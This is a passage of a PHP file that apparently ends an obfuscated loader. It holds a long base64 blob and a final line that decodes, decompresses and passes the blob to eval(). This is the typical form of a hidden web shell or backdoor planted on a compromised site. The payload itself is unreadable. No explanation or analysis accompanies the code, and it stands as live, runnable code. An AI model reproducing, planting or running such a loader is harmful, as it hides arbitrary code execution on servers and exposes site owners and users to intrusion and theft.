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";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));
?>